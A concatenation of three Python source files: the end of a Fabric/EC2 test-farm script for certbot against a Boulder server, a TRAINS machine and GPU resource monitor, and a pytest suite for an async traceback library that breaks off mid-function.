_instance = EC2.Instance(id=_id)
_state = _instance.state['Name']
_ip = _instance.public_ip_address
block_until_ssh_open(_ip)
time.sleep(extra_wait_time)
return _instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(repo_url):
"clones master of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('tar czf le.tar.gz letsencrypt')
def local_git_branch(repo_url, branch_name):
"clones branch <branch_name> of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt --branch %s --single-branch'%(repo_url, branch_name))
local('tar czf le.tar.gz letsencrypt')
def local_git_PR(repo_url, PRnumstr, merge_master=True):
"clones specified pull request from repo_url and optionally merges into master"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s letsencrypt'% repo_url)
local('cd letsencrypt && git fetch origin pull/%s/head:lePRtest'%PRnumstr)
local('cd letsencrypt && git checkout lePRtest')
if merge_master:
local('cd letsencrypt && git remote update origin')
local('cd letsencrypt && git merge origin/master -m "testmerge"')
local('tar czf le.tar.gz letsencrypt')
def local_repo_to_remote():
"copies local tarball of repo to remote"
with lcd(LOGDIR):
put(local_path='le.tar.gz', remote_path='')
run('tar xzf le.tar.gz')
def local_repo_clean():
"delete tarball"
with lcd(LOGDIR):
local('rm le.tar.gz')
def deploy_script(scriptpath, *args):
"copies to remote and executes local script"
#with lcd('scripts'):
put(local_path=scriptpath, remote_path='', mirror_local_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
run('./'+scriptfile+' '+args_str)
def run_boulder():
with cd('$GOPATH/src/github.com/letsencrypt/boulder'):
run('go run cmd/rabbitmq-setup/main.go -server amqp://localhost')
run('nohup ./start.py >& /dev/null < /dev/null &')
def config_and_launch_boulder(instance):
execute(deploy_script, 'scripts/boulder_config.sh')
execute(run_boulder)
def install_and_launch_certbot(instance, boulder_url, target):
execute(local_repo_to_remote)
with shell_env(BOULDER_URL=boulder_url,
PUBLIC_IP=instance.public_ip_address,
PRIVATE_IP=instance.private_ip_address,
PUBLIC_HOSTNAME=instance.public_dns_name,
PIP_EXTRA_INDEX_URL=cl_args.alt_pip,
OS_TYPE=target['type']):
execute(deploy_script, cl_args.test_script)
def grab_certbot_log():
"grabs letsencrypt.log via cat into logged stdout"
sudo('if [ -f /var/log/letsencrypt/letsencrypt.log ]; then \
cat /var/log/letsencrypt/letsencrypt.log; else echo "[novarlog]"; fi')
# fall back to a local log file in case /var/log is unwritable
sudo('if [ -f ./certbot.log ]; then \
cat ./certbot.log; else echo "[nolocallog]"; fi')
def create_client_instances(targetlist):
"Create a fleet of client instances"
instances = []
print("Creating instances: ", end="")
for target in targetlist:
if target['virt'] == 'hvm':
machine_type = 't2.medium' if cl_args.fast else 't2.micro'
else:
# 32 bit systems
machine_type = 'c1.medium' if cl_args.fast else 't1.micro'
if 'userdata' in target.keys():
userdata = target['userdata']
else:
userdata = ''
name = 'le-%s'%target['name']
print(name, end=" ")
instances.append(make_instance(name,
target['ami'],
KEYNAME,
machine_type=machine_type,
userdata=userdata))
print()
return instances
def test_client_process(inqueue, outqueue):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, target = inreq
#save all stdout to log file
sys.stdout = open(LOGDIR+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instances[ii] = block_until_instance_ready(instances[ii])
print("server %s at %s"%(instances[ii], instances[ii].public_ip_address))
env.host_string = "%s@%s"%(target['user'], instances[ii].public_ip_address)
print(env.host_string)
try:
install_and_launch_certbot(instances[ii], boulder_url, target)
outqueue.put((ii, target, 'pass'))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, 'fail'))
print("%s - %s FAIL"%(target['ami'], target['name']))
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
execute(grab_certbot_log)
except:
print("log fail\n")
pass
def cleanup(cl_args, instances, targetlist):
print('Logs in ', LOGDIR)
if not cl_args.saveinstances:
print('Terminating EC2 Instances and Cleaning Dangling EBS Volumes')
if cl_args.killboulder:
boulder_server.terminate()
terminate_and_clean(instances)
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
#-------------------------------------------------------------------------------
# SCRIPT BEGINS
#-------------------------------------------------------------------------------
# Fabric library controlled through global env parameters
env.key_filename = KEYFILE
env.shell = '/bin/bash -l -i -c'
env.connection_attempts = 5
env.timeout = 10
# replace default SystemExit thrown by fabric during trouble
class FabricException(Exception):
pass
env['abort_exception'] = FabricException
# Set up local copy of git repo
#-------------------------------------------------------------------------------
LOGDIR = "letest-%d"%int(time.time())
print("Making local dir for test repo and logs: %s"%LOGDIR)
local('mkdir %s'%LOGDIR)
# figure out what git object to test and locally create it in LOGDIR
print("Making local git repo")
try:
if cl_args.pull_request != '~':
print('Testing PR %s '%cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
execute(local_git_PR, cl_args.repo, cl_args.pull_request, cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s'%(cl_args.branch, cl_args.repo))
execute(local_git_branch, cl_args.repo, cl_args.branch)
else:
print('Testing master of %s'%cl_args.repo)
execute(local_git_clone, cl_args.repo)
except FabricException:
print("FAIL: trouble with git repo")
exit()
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
AWS_SESSION = boto3.session.Session(profile_name=PROFILE)
EC2 = AWS_SESSION.resource('ec2')
print("Making Security Group")
sg_exists = False
for sg in EC2.security_groups.all():
if sg.group_name == 'letsencrypt_test':
sg_exists = True
print(" %s already exists"%'letsencrypt_test')
if not sg_exists:
make_security_group()
time.sleep(30)
boulder_preexists = False
boulder_servers = EC2.instances.filter(Filters=[
{'Name': 'tag:Name', 'Values': ['le-boulderserver']},
{'Name': 'instance-state-name', 'Values': ['running']}])
boulder_server = next(iter(boulder_servers), None)
print("Requesting Instances...")
if boulder_server:
print("Found existing boulder server:", boulder_server)
boulder_preexists = True
else:
print("Can't find a boulder server, starting one...")
boulder_server = make_instance('le-boulderserver',
BOULDER_AMI,
KEYNAME,
machine_type='t2.micro',
#machine_type='t2.medium',
security_groups=['letsencrypt_test'])
try:
if not cl_args.boulderonly:
instances = create_client_instances(targetlist)
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
# env.host_string defines the ssh user and host for connection
env.host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", env.host_string)
if not boulder_preexists:
print("Configuring and Launching Boulder")
config_and_launch_boulder(boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
wait_time=10, timeout=500)
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
if cl_args.boulderonly:
sys.exit(0)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%LOGDIR)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue;
# the latter has implementation flaws that can deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
SENTINEL = None #queue kill signal
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=(inqueue, outqueue))
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
# wait on termination of client processes
for p in jobs:
p.join()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
execute(local_repo_clean)
# print and save summary results
results_file = open(LOGDIR+'/results', 'w')
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
for outq in outputs:
ii, target, status = outq
print('%d %s %s'%(ii, target['name'], status))
results_file.write('%d %s %s\n'%(ii, target['name'], status))
results_file.close()
finally:
cleanup(cl_args, instances, targetlist)
# kill any connections
fabric.network.disconnect_all()
|
resource_monitor.py
|
import logging
import os
import warnings
from time import time
from threading import Thread, Event
import psutil
from pathlib2 import Path
from typing import Text
from ..binding.frameworks.tensorflow_bind import IsTensorboardInit
try:
from .gpu import gpustat
except ImportError:
gpustat = None
class ResourceMonitor(object):
_title_machine = ':monitor:machine'
_title_gpu = ':monitor:gpu'
def __init__(self, task, sample_frequency_per_sec=2., report_frequency_sec=30.,
first_report_sec=None, wait_for_first_iteration_to_start_sec=180.0,
max_wait_for_first_iteration_to_start_sec=1800., report_mem_used_per_process=True):
self._task = task
self._sample_frequency = sample_frequency_per_sec
self._report_frequency = report_frequency_sec
self._first_report_sec = first_report_sec or report_frequency_sec
self._wait_for_first_iteration = wait_for_first_iteration_to_start_sec
self._max_check_first_iteration = max_wait_for_first_iteration_to_start_sec
self._num_readouts = 0
self._readouts = {}
self._previous_readouts = {}
self._previous_readouts_ts = time()
self._thread = None
self._exit_event = Event()
self._gpustat_fail = 0
self._gpustat = gpustat
self._active_gpus = None
self._process_info = psutil.Process() if report_mem_used_per_process else None
self._last_process_pool = {}
self._last_process_id_list = []
if not self._gpustat:
self._task.get_logger().report_text('TRAINS Monitor: GPU monitoring is not available')
else: # if running_remotely():
try:
active_gpus = os.environ.get('NVIDIA_VISIBLE_DEVICES', '') or \
os.environ.get('CUDA_VISIBLE_DEVICES', '')
if active_gpus:
self._active_gpus = [int(g.strip()) for g in active_gpus.split(',')]
except Exception:
pass
def start(self):
self._exit_event.clear()
self._thread = Thread(target=self._run)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._exit_event.set()
# self._thread.join()
def _run(self):
# noinspection PyBroadException
try:
self._daemon()
except Exception:
pass
def _daemon(self):
seconds_since_started = 0
reported = 0
last_iteration = 0
fallback_to_sec_as_iterations = None
# get max GPU ID, and make sure our active list is within range
if self._active_gpus:
try:
gpu_stat = self._gpustat.new_query()
if max(self._active_gpus) > len(gpu_stat.gpus) - 1:
self._active_gpus = None
except Exception:
pass
# last_iteration_interval = None
# last_iteration_ts = 0
# repeated_iterations = 0
while True:
last_report = time()
current_report_frequency = self._report_frequency if reported != 0 else self._first_report_sec
while (time() - last_report) < current_report_frequency:
# wait for self._sample_frequency seconds, if event set quit
if self._exit_event.wait(1.0 / self._sample_frequency):
return
# noinspection PyBroadException
try:
self._update_readouts()
except Exception:
pass
seconds_since_started += int(round(time() - last_report))
# check whether no metrics are being reported (in which case the last iteration will not change)
if fallback_to_sec_as_iterations is None:
if IsTensorboardInit.tensorboard_used():
fallback_to_sec_as_iterations = False
elif seconds_since_started >= self._wait_for_first_iteration:
self._task.get_logger().report_text('TRAINS Monitor: Could not detect iteration reporting, '
'falling back to iterations as seconds-from-start')
fallback_to_sec_as_iterations = True
elif fallback_to_sec_as_iterations is True and seconds_since_started <= self._max_check_first_iteration:
if self._check_logger_reported():
fallback_to_sec_as_iterations = False
self._task.get_logger().report_text('TRAINS Monitor: Reporting detected, '
'reverting back to iteration based reporting')
clear_readouts = True
# if we do not have last_iteration, we just use seconds as iteration
if fallback_to_sec_as_iterations:
iteration = seconds_since_started
else:
iteration = self._task.get_last_iteration()
if iteration < last_iteration:
# we started a new session?!
# wait out
clear_readouts = False
iteration = last_iteration
elif iteration == last_iteration:
# repeated_iterations += 1
# if last_iteration_interval:
# # to be on the safe side, we don't want to pass the actual next iteration
# iteration += int(0.95*last_iteration_interval[0] * (seconds_since_started - last_iteration_ts)
# / last_iteration_interval[1])
# else:
# iteration += 1
clear_readouts = False
iteration = last_iteration
else:
# last_iteration_interval = (iteration - last_iteration, seconds_since_started - last_iteration_ts)
# repeated_iterations = 0
# last_iteration_ts = seconds_since_started
last_iteration = iteration
fallback_to_sec_as_iterations = False
clear_readouts = True
# start reporting only when we figured out, if this is seconds based, or iterations based
average_readouts = self._get_average_readouts()
if fallback_to_sec_as_iterations is not None:
for k, v in average_readouts.items():
# noinspection PyBroadException
try:
title = self._title_gpu if k.startswith('gpu_') else self._title_machine
# round to 3 decimal places
value = round(v * 1000) / 1000.
self._task.get_logger().report_scalar(title=title, series=k, iteration=iteration, value=value)
except Exception:
pass
# clear the accumulated readouts, unless this report should keep averaging over them
if clear_readouts:
self._clear_readouts()
# count reported iterations
reported += 1
def _update_readouts(self):
readouts = self._machine_stats()
elapsed = time() - self._previous_readouts_ts
self._previous_readouts_ts = time()
for k, v in readouts.items():
# cumulative measurements
if k.endswith('_mbs'):
v = (v - self._previous_readouts.get(k, v)) / elapsed
self._readouts[k] = self._readouts.get(k, 0.0) + v
self._num_readouts += 1
self._previous_readouts = readouts
def _get_num_readouts(self):
return self._num_readouts
def _get_average_readouts(self):
average_readouts = dict((k, v / float(self._num_readouts)) for k, v in self._readouts.items())
return average_readouts
def _clear_readouts(self):
self._readouts = {}
self._num_readouts = 0
def _machine_stats(self):
"""
:return: machine stats dictionary; usage values in percent, memory sizes in GB,
network/disk IO counters in MB, temperatures in degrees Celsius
"""
cpu_usage = [float(v) for v in psutil.cpu_percent(percpu=True)]
stats = {
"cpu_usage": sum(cpu_usage) / float(len(cpu_usage)),
}
bytes_per_megabyte = 1024 ** 2
def bytes_to_megabytes(x):
return x / bytes_per_megabyte
virtual_memory = psutil.virtual_memory()
# stats["memory_used_gb"] = bytes_to_megabytes(virtual_memory.used) / 1024
stats["memory_used_gb"] = bytes_to_megabytes(
self._get_process_used_memory() if self._process_info else virtual_memory.used) / 1024
stats["memory_free_gb"] = bytes_to_megabytes(virtual_memory.available) / 1024
disk_use_percentage = psutil.disk_usage(Text(Path.home())).percent
stats["disk_free_percent"] = 100.0 - disk_use_percentage
with warnings.catch_warnings():
if logging.root.level > logging.DEBUG: # If the logging level is bigger than debug, ignore
# psutil.sensors_temperatures warnings
warnings.simplefilter("ignore", category=RuntimeWarning)
sensor_stat = (psutil.sensors_temperatures() if hasattr(psutil, "sensors_temperatures") else {})
if "coretemp" in sensor_stat and len(sensor_stat["coretemp"]):
stats["cpu_temperature"] = max([float(t.current) for t in sensor_stat["coretemp"]])
# update cached measurements
net_stats = psutil.net_io_counters()
stats["network_tx_mbs"] = bytes_to_megabytes(net_stats.bytes_sent)
stats["network_rx_mbs"] = bytes_to_megabytes(net_stats.bytes_recv)
io_stats = psutil.disk_io_counters()
stats["io_read_mbs"] = bytes_to_megabytes(io_stats.read_bytes)
stats["io_write_mbs"] = bytes_to_megabytes(io_stats.write_bytes)
# check if we can access the gpu statistics
if self._gpustat:
try:
stats.update(self._get_gpu_stats())
except Exception:
# something happened and we can't use gpu stats,
self._gpustat_fail += 1
if self._gpustat_fail >= 3:
self._task.get_logger().report_text('TRAINS Monitor: GPU monitoring failed getting GPU reading, '
'switching off GPU monitoring')
self._gpustat = None
return stats
def _check_logger_reported(self):
titles = self.get_logger_reported_titles(self._task)
return len(titles) > 0
@classmethod
def get_logger_reported_titles(cls, task):
titles = list(task.get_logger()._get_used_title_series().keys())
try:
titles.remove(cls._title_machine)
except ValueError:
pass
try:
titles.remove(cls._title_gpu)
except ValueError:
pass
return titles
def _get_process_used_memory(self):
def mem_usage_children(a_mem_size, pr, parent_mem=None):
self._last_process_id_list.append(pr.pid)
# add our own memory usage
our_mem = pr.memory_info()
mem_diff = our_mem.rss - parent_mem.rss if parent_mem else our_mem.rss
a_mem_size += mem_diff if mem_diff > 0 else 0
# now we are the parent
for child in pr.children():
# get the current memory
m = pr.memory_info()
mem_diff = m.rss - our_mem.rss
a_mem_size += mem_diff if mem_diff > 0 else 0
a_mem_size = mem_usage_children(a_mem_size, child, parent_mem=m)
return a_mem_size
# only run the memory usage query once per reporting period
# because this memory query is relatively slow, and changes very little.
if self._last_process_pool.get('cpu') and \
(time() - self._last_process_pool['cpu'][0]) < self._report_frequency:
return self._last_process_pool['cpu'][1]
# if we have no parent process, return 0 (it's an error)
if not self._process_info:
return 0
self._last_process_id_list = []
mem_size = mem_usage_children(0, self._process_info)
self._last_process_pool['cpu'] = time(), mem_size
return mem_size
def _get_gpu_stats(self):
if not self._gpustat:
return {}
# the per-process memory query is slow, so we only call it once per reporting period;
# for the rest of the samples we return the previous memory measurement
# update mem used by our process and sub processes
if self._process_info and (not self._last_process_pool.get('gpu') or
(time() - self._last_process_pool['gpu'][0]) >= self._report_frequency):
gpu_stat = self._gpustat.new_query(per_process_stats=True)
gpu_mem = {}
for i, g in enumerate(gpu_stat.gpus):
# only monitor the active GPUs; if none were selected, monitor everything
if self._active_gpus and i not in self._active_gpus:
continue
gpu_mem[i] = 0
for p in g.processes:
if p['pid'] in self._last_process_id_list:
gpu_mem[i] += p.get('gpu_memory_usage', 0)
self._last_process_pool['gpu'] = time(), gpu_mem
else:
# if we do not need to update the per-process memory usage, run the global query
# if we have no parent process (backward compatibility), return global stats
gpu_stat = self._gpustat.new_query()
gpu_mem = self._last_process_pool['gpu'][1] if self._last_process_pool.get('gpu') else None
# generate the statistics dict for actual report
stats = {}
for i, g in enumerate(gpu_stat.gpus):
# only monitor the active GPUs; if none were selected, monitor everything
if self._active_gpus and i not in self._active_gpus:
continue
stats["gpu_%d_temperature" % i] = float(g["temperature.gpu"])
stats["gpu_%d_utilization" % i] = float(g["utilization.gpu"])
stats["gpu_%d_mem_usage" % i] = 100. * float(g["memory.used"]) / float(g["memory.total"])
# already in MBs
stats["gpu_%d_mem_free_gb" % i] = float(g["memory.total"] - g["memory.used"]) / 1024
# use previously sampled process gpu memory, or global if it does not exist
stats["gpu_%d_mem_used_gb" % i] = float(gpu_mem[i] if gpu_mem else g["memory.used"]) / 1024
return stats
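# A minimal usage sketch (hedged: `task` is assumed to be a TRAINS Task object
# exposing get_logger() and get_last_iteration(), as used above; it is not defined
# in this module):
#
#   monitor = ResourceMonitor(task, report_frequency_sec=30.)
#   monitor.start()   # spawns the daemon sampling thread
#   ...               # run the training loop; stats are reported as scalars
#   monitor.stop()    # signals the sampling loop to exit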
|
test_traceback.py
|
import contextlib
import gc
import re
import sys
import threading
import types
from contextlib import ExitStack, contextmanager
from functools import partial
from typing import List, Callable, Any, cast
import attr
import pytest
from .. import FrameInfo, Traceback, customize, register_get_target
def remove_address_details(line):
return re.sub(r"\b0x[0-9A-Fa-f]+\b", "(address)", line)
def clean_tb_line(line):
return remove_address_details(line).partition(" #")[0]
def assert_tb_matches(tb, expected, error=None):
# smoke test:
str(tb)
tb.as_stdlib_summary()
tb.as_stdlib_summary(capture_locals=True)
for frame in tb.frames:
str(frame)
try:
if error is None and tb.error is not None: # pragma: no cover
raise tb.error
assert type(tb.error) is type(error)
assert remove_address_details(str(tb.error)) == remove_address_details(
str(error)
)
assert len(tb) == len(expected)
for (
entry,
(expect_fn, expect_line, expect_ctx_name, expect_ctx_typename),
) in zip(tb, expected):
assert entry.funcname == expect_fn
assert clean_tb_line(entry.linetext) == expect_line
assert entry.context_name == expect_ctx_name
if entry.context_manager is None:
assert expect_ctx_typename is None
else:
assert type(entry.context_manager).__name__ == expect_ctx_typename
except Exception: # pragma: no cover
print_assert_matches("tb")
raise
def print_assert_matches(get_tb): # pragma: no cover
parent = sys._getframe(1)
get_tb_code = compile(get_tb, "<eval>", "eval")
tb = eval(get_tb_code, parent.f_globals, parent.f_locals)
print("---")
print(str(tb).rstrip())
print("---")
print(" assert_tb_matches(")
print(" " + get_tb + ",")
print(" [")
for entry in tb:
if entry.frame.f_code is get_tb_code:
funcname = parent.f_code.co_name
linetext = get_tb + ","
else:
funcname = entry.funcname
linetext = clean_tb_line(entry.linetext)
typename = type(entry.context_manager).__name__
if typename == "NoneType":
typename = None
record = (funcname, linetext, entry.context_name, typename)
print(" " + repr(record) + ",")
print(" ],")
if tb.error:
print(f" error={remove_address_details(repr(tb.error))},")
print(" )")
def no_abort(_): # pragma: no cover
import trio
return trio.lowlevel.Abort.FAILED
@contextmanager
def null_context():
yield
@contextmanager
def outer_context():
with inner_context() as inner: # noqa: F841
yield
def exit_cb(*exc):
pass
def other_cb(*a, **kw):
pass
@contextmanager
def inner_context():
stack = ExitStack()
with stack:
stack.enter_context(null_context())
stack.push(exit_cb)
stack.callback(other_cb, 10, "hi", answer=42)
yield
@types.coroutine
def async_yield(value):
return (yield value)
null_mgr = null_context()
with null_mgr:
if hasattr(null_mgr, "func"):
null_context_repr = "asynctb._tests.test_traceback.null_context()"
else:
null_context_repr = "null_context(...)"
del null_mgr
# There's some logic in the traceback extraction of running code that
# behaves differently when it's run in a non-main greenlet on CPython,
# because we have to stitch together the traceback portions from
# different greenlets. To exercise it, we'll run some tests in a
# non-main greenlet as well as at top level.
try:
import greenlet # type: ignore
except ImportError:
def try_in_other_greenlet_too(fn):
return fn
else:
def try_in_other_greenlet_too(fn):
def try_both():
fn()
greenlet.greenlet(fn).switch()
return try_both
def frames_from_inner_context(caller):
return [
(
caller,
"with inner_context() as inner:",
"inner",
"_GeneratorContextManager",
),
("inner_context", "with stack:", "stack", "ExitStack"),
(
"inner_context",
f"# stack.enter_context({null_context_repr})",
"stack[0]",
"_GeneratorContextManager",
),
("null_context", "yield", None, None),
(
"inner_context",
"# stack.push(asynctb._tests.test_traceback.exit_cb)",
"stack[1]",
None,
),
(
"inner_context",
"# stack.callback(asynctb._tests.test_traceback.other_cb, 10, 'hi', answer=42)",
"stack[2]",
None,
),
("inner_context", "yield", None, None),
]
def frames_from_outer_context(caller):
return [
(caller, "with outer_context():", None, "_GeneratorContextManager"),
*frames_from_inner_context("outer_context"),
("outer_context", "yield", None, None),
]
@try_in_other_greenlet_too
def test_running():
# These two layers of indirection are mostly to test that skip_callees
# works when using iterate_running.
@customize(skip_frame=True, skip_callees=True)
def call_call_traceback_since(root):
return call_traceback_since(root)
def call_traceback_since(root):
return Traceback.since(root)
def sync_example(root):
with outer_context():
if isinstance(root, types.FrameType):
return call_call_traceback_since(root)
else:
return Traceback.of(root)
# Currently running in this thread
assert_tb_matches(
sync_example(sys._getframe(0)),
[
("test_running", "sync_example(sys._getframe(0)),", None, None),
*frames_from_outer_context("sync_example"),
("sync_example", "return call_call_traceback_since(root)", None, None),
],
)
async def async_example():
root = await async_yield(None)
await async_yield(sync_example(root))
def generator_example():
root = yield
yield sync_example(root)
async def agen_example():
root = yield
yield sync_example(root)
for which in (async_example, generator_example, agen_example):
it = which()
if which is agen_example:
def send(val):
with pytest.raises(StopIteration) as info:
it.asend(val).send(None)
return info.value.value
else:
send = it.send
send(None)
if which is async_example:
line = "await async_yield(sync_example(root))"
else:
line = "yield sync_example(root)"
assert_tb_matches(
send(it),
[
(which.__name__, line, None, None),
*frames_from_outer_context("sync_example"),
("sync_example", "return Traceback.of(root)", None, None),
],
)
def test_suspended():
async def async_example(depth):
if depth >= 1:
return await async_example(depth - 1)
with outer_context():
return await async_yield(1)
async def agen_example(depth):
await async_example(depth)
yield # pragma: no cover
agen_makers = [agen_example]
try:
import async_generator
except ImportError:
agen_backport_example = None
else:
@async_generator.async_generator
async def agen_backport_example(depth):
await async_example(depth)
await async_generator.yield_() # pragma: no cover
agen_makers.append(agen_backport_example)
# Suspended coroutine
coro = async_example(3)
assert coro.send(None) == 1
assert_tb_matches(
Traceback.of(coro),
[
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_example(depth - 1)", None, None),
*frames_from_outer_context("async_example"),
("async_example", "return await async_yield(1)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
assert_tb_matches(
Traceback.of(coro, with_context_info=False),
[
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_example(depth - 1)", None, None),
("async_example", "return await async_yield(1)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
with pytest.raises(StopIteration, match="42"):
coro.send(42)
# Suspended async generator
for thing in agen_makers:
agi = thing(3)
ags = agi.asend(None)
assert ags.send(None) == 1
for view in (agi, ags):
assert_tb_matches(
Traceback.of(view, with_context_info=False),
[
(thing.__name__, "await async_example(depth)", None, None),
(
"async_example",
"return await async_example(depth - 1)",
None,
None,
),
(
"async_example",
"return await async_example(depth - 1)",
None,
None,
),
(
"async_example",
"return await async_example(depth - 1)",
None,
None,
),
("async_example", "return await async_yield(1)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
# Exhausted coro/generator has no traceback
assert_tb_matches(Traceback.of(coro), [])
def test_greenlet():
greenlet = pytest.importorskip("greenlet")
tb_main = Traceback.of(greenlet.getcurrent())
assert tb_main.error is None and tb_main.frames[-1].funcname == "test_greenlet"
def outer():
with outer_context():
return inner()
def inner():
# Test getting the traceback of a greenlet from inside it
assert_tb_matches(
Traceback.of(gr),
[
*frames_from_outer_context("outer"),
("outer", "return inner()", None, None),
("inner", "Traceback.of(gr),", None, None),
],
)
return greenlet.getcurrent().parent.switch(1)
gr = greenlet.greenlet(outer)
assert_tb_matches(Traceback.of(gr), []) # not started -> empty tb
assert 1 == gr.switch()
assert_tb_matches(
Traceback.of(gr),
[
*frames_from_outer_context("outer"),
("outer", "return inner()", None, None),
("inner", "return greenlet.getcurrent().parent.switch(1)", None, None),
],
)
assert 2 == gr.switch(2)
assert_tb_matches(Traceback.of(gr), []) # dead -> empty tb
# Test tracing into the runner for a dead greenlet
def trivial_runner(gr):
assert_tb_matches(
Traceback.since(sys._getframe(0)),
[("trivial_runner", "Traceback.since(sys._getframe(0)),", None, None)],
)
@register_get_target(trivial_runner)
def get_target(frame, is_terminal):
return frame.f_locals.get("gr")
trivial_runner(gr)
def test_get_target_fails():
outer_frame = sys._getframe(0)
def inner():
return Traceback.since(outer_frame)
@customize(get_target=lambda *args: {}["wheee"])
def example():
return inner()
# Frames that produce an error get mentioned in the traceback,
# even if they'd otherwise be skipped
@customize(skip_frame=True, get_target=lambda *args: {}["wheee"])
def skippy_example():
return inner()
for fn in (example, skippy_example):
assert_tb_matches(
fn(),
[
("test_get_target_fails", "fn(),", None, None),
(fn.__name__, "return inner()", None, None),
],
error=KeyError("wheee"),
)
@pytest.mark.skipif(
sys.implementation.name == "pypy",
reason="https://foss.heptapod.net/pypy/pypy/-/blob/branch/py3.6/lib_pypy/greenlet.py#L124",
)
def test_greenlet_in_other_thread():
greenlet = pytest.importorskip("greenlet")
ready_evt = threading.Event()
done_evt = threading.Event()
gr = None
def thread_fn():
def target():
ready_evt.set()
done_evt.wait()
nonlocal gr
gr = greenlet.greenlet(target)
gr.switch()
threading.Thread(target=thread_fn).start()
ready_evt.wait()
assert_tb_matches(
Traceback.of(gr),
[],
error=RuntimeError(
"Traceback.of(greenlet) can't handle a greenlet running in another thread"
),
)
done_evt.set()
def test_exiting():
# Test traceback when a synchronous context manager is currently exiting.
result: Traceback
@contextmanager
def capture_tb_on_exit(coro):
with inner_context() as inner: # noqa: F841
try:
yield
finally:
nonlocal result
result = Traceback.of(coro)
async def async_capture_tb():
coro = await async_yield(None)
with capture_tb_on_exit(coro):
pass
await async_yield(result)
coro = async_capture_tb()
coro.send(None)
assert_tb_matches(
coro.send(coro),
[
(
"async_capture_tb",
"with capture_tb_on_exit(coro):",
None,
"_GeneratorContextManager",
),
("async_capture_tb", "pass", None, None),
("__exit__", "next(self.gen)", None, None),
*frames_from_inner_context("capture_tb_on_exit"),
("capture_tb_on_exit", "result = Traceback.of(coro)", None, None),
],
)
# Test traceback when an async CM is suspended in __aexit__. The
# definition of __aexit__ as a staticmethod is to foil the logic
# for figuring out which context manager is exiting.
class SillyAsyncCM:
async def __aenter__(self):
pass
@staticmethod
async def __aexit__(*stuff):
await async_yield(None)
async def yield_when_async_cm_exiting():
async with SillyAsyncCM():
pass
coro = yield_when_async_cm_exiting()
coro.send(None)
assert_tb_matches(
Traceback.of(coro),
[
("yield_when_async_cm_exiting", "async with SillyAsyncCM():", None, None),
("yield_when_async_cm_exiting", "pass", None, None),
("__aexit__", "await async_yield(None)", None, None),
("async_yield", "return (yield value)", None, None),
],
)
def test_errors():
with pytest.raises(TypeError, match="must be a frame"):
Traceback.since(42)
with pytest.raises(TypeError, match="must be a frame or integer"):
Traceback.until(sys._getframe(0), limit=2.4)
with pytest.raises(RuntimeError, match="is not an indirect caller of"):
Traceback.until(sys._getframe(1), limit=sys._getframe(0))
@try_in_other_greenlet_too
def test_traceback_until():
outer = sys._getframe(0)
def example():
inner = sys._getframe(0)
def get_tb(limit):
return Traceback.until(inner, limit=limit)
tb1, tb2, tb3 = [get_tb(lim) for lim in (1, outer, None)]
assert tb1 == tb2
assert tb3.frames[-len(tb1) :] == tb1.frames
assert_tb_matches(
tb1,
[
("test_traceback_until", "example()", None, None),
(
"example",
"tb1, tb2, tb3 = [get_tb(lim) for lim in (1, outer, None)]",
None,
None,
),
],
)
example()
@try_in_other_greenlet_too
def test_running_in_thread():
def thread_example(arrived_evt, depart_evt):
with outer_context():
arrived_evt.set()
depart_evt.wait()
def thread_caller(*args):
thread_example(*args)
# Currently running in other thread
for cooked in (False, True):
